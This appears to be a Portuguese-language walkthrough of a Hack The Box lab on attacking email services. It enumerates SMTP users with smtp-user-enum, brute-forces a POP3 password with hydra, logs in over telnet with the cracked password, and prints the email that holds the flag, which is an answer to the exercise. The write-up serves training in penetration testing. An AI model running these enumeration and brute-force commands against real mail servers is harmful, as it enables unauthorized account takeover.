Questions
Qual é o nome de usuário disponível para o domínio inlanefreight.htb no servidor SMTP?
Payload
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -D inlanefreight.htb -t 10.129.149.216 
Acesse a conta de e-mail usando as credenciais de usuário que você descobriu e envie o sinalizador no e-mail como sua resposta.
Brute force no e-mail encontrado para descobrir a senha
hydra -l marlin@inlanefreight.htb -P pws.list pop3://10.129.149.216 -t 10
Login via Telnet
telnet 10.129.149.216 110
USER marlin@inlanefreight.htb
Pass poohbearUsar o comando
LISTpara listar todos os e-mails enviados
LIST
+OK 1 messages (601 octets)
1 601
.Notamos que existe uma mensagem enviada para um cliente
Usar o comando
RETRseguido pelo número da mensagem. No seu caso, o número da mensagem é 1:
RETR 1
+OK 601 octets
Return-Path: marlin@inlanefreight.htb
Received: from [10.10.14.33] (Unknown [10.10.14.33])
by WINSRV02 with ESMTPA
; Wed, 20 Apr 2022 14:49:32 -0500
Message-ID: <85cb72668d8f5f8436d36f085e0167ee78cf0638.camel@inlanefreight.htb>
Subject: Password change
From: marlin <marlin@inlanefreight.htb>
To: administrator@inlanefreight.htb
Cc: marlin@inlanefreight.htb
Date: Wed, 20 Apr 2022 15:49:11 -0400
Content-Type: text/plain; charset="UTF-8"
User-Agent: Evolution 3.38.3-1
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Hi admin,
How can I change my password to something more secure?
flag: HTB{w34k_p4$$w0rd}Last updated